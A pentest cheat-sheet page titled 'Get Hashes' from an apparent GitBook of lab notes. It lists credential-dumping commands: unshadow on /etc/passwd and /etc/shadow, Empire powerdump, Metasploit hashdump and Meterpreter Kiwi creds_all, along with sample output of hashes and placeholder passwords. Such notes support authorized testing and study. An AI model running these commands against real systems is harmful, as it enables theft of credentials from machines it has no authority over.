Pentest
  • Homepage
  • Pentest Links
  • 01 Prep
    • Target Inventory
    • OSINT and Dorks
    • Recon-ng dns zone snoop
    • ❤️Gitbook
  • 02 Scan
    • *Favorites
    • Burp
    • Dirb nikto wpscan etc
    • Enum Finger and Brute SSH
    • Fuzzing
    • Nmap
    • Open Port Checks OneLiner
    • Port Knocking
    • SSL Issues
    • Tcpdump
  • 03 Getting In
    • Char Evasion Tricks
    • Email SMTP
    • Eternal Blue
    • FTP
    • heartbleed
    • Metasploit
    • MySql
    • NFS
    • Oracle
    • Postgres
    • PowerShell Empire
    • Shells
    • rpc
    • SMB Samba
    • SSH Tips
    • SQLite3
    • Veil
  • 04 WebApps
    • Apache
    • Blogs
    • Coldfusion
    • Content Management (CMS)
    • Drupal
    • Elastix FreePBX
    • HttpFileServer (HFS)
    • IIS
    • IIS6 WebDav
    • Local File Inclusion (LFI)
    • Magento
    • Nagios
    • PFSense
    • php
    • php type juggling
    • phpLite
    • Web Injections
    • Javascript
    • Shellshock
    • SQL Injections (sqli)
    • SQLMap
    • WAF
    • Webmin
    • Web Scrape
    • Wordpress
  • 05 Passwords & Ciphers
    • Cipher Decrypt
    • Cipher RSA Wiener P-Q-E
    • Cracking
    • Dict Guess List Mangle
    • Get Hashes
    • Hydra Brutes
    • Images Exif Steg
    • Malware Analysis
    • Pull Hashes PCredz
    • SSH PrivKey Passphrase
    • Unzip Crack
    • Windows PW
  • 06 Linux PrivEsc
    • 1 Look Around
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • binaries
    • Buffer Overflow
    • bash prison
    • Monitor Files
    • mongodb node
    • Pivots
    • Remote Execute
    • Shell TTY Fix
    • TAR backups
    • Transfer Files
    • vnc
  • 07 Windows PrivEsc
    • 1 Windows cmd kungfu
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • Bloodhound
    • DLL Hijack MSF
    • Kerberos
    • Memory Analysis
    • NTDS
    • Powershell
    • Responder
    • Saved Creds runas
Powered by GitBook
On this page
  • Hash-identifier
  • unshadow (john)
  • Empire on Windows
  • Metasploit - hashdump
  • Meterpreter Kiwi

Was this helpful?

  1. 05 Passwords & Ciphers

Get Hashes

Hash-identifier

> hashid 123XYZ...
> hash-identifier

unshadow (john)

unshadow /etc/passwd /etc/shadow combined.txt

Empire on Windows

(Empire: powershell/credentials/powerdump) > run
[*] Tasked DHX9MABL to run TASK_CMD_JOB
[*] Agent DHX9MABL tasked with task ID 1
[*] Tasked agent agentHIGH to run module powershell/credentials/powerdump
(Empire: powershell/credentials/powerdump) > [*] Agent DHX9MABL returned results.

Administrator:500:blahblahlongstring123xyzabclongstring123abcxyz123abcxyzaa:::
mike:1202:blahblahlongstring123xyzabclongstring123abcxyz123abcxyzaa:::

Metasploit - hashdump

smart_hashdump  ..sometimes isnt so smart
hashdump        ..try both!!!!!

meterpreter > run post/windows/gather/smart_hashdump
meterpreter > run post/windows/gather/hashdump

Meterpreter Kiwi

meterpreter > load kiwi
meterpreter > creds_all

[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain   NTLM                              SHA1
--------       ------   ----                              ----
Administrator  TARGET   abxlkaselkbjlcije89893289823sers  lkjawleijviw989w8evw98va9898wer9w8e42893
KALI$          TARGET   kleilvkejlaijlsijej3902930923409  0902349824lkajslkjvliaejlwejoifjwf092039

wdigest credentials
===================

Username       Domain   Password
--------       ------   --------
(null)         (null)   (null)
Administrator  TARGET   secretPW
KALI$          TARGET   youFOUNDmypaxxwurd

kerberos credentials
====================

Username       Domain        Password
--------       ------        --------
(null)         (null)        (null)
Administrator  TARGET        (null)
KALI$          target.local  youFOUNDmypaxxwurd
kali   $       target.LOCAL  (null)
PreviousDict Guess List MangleNextHydra Brutes

Last updated 2 years ago

Was this helpful?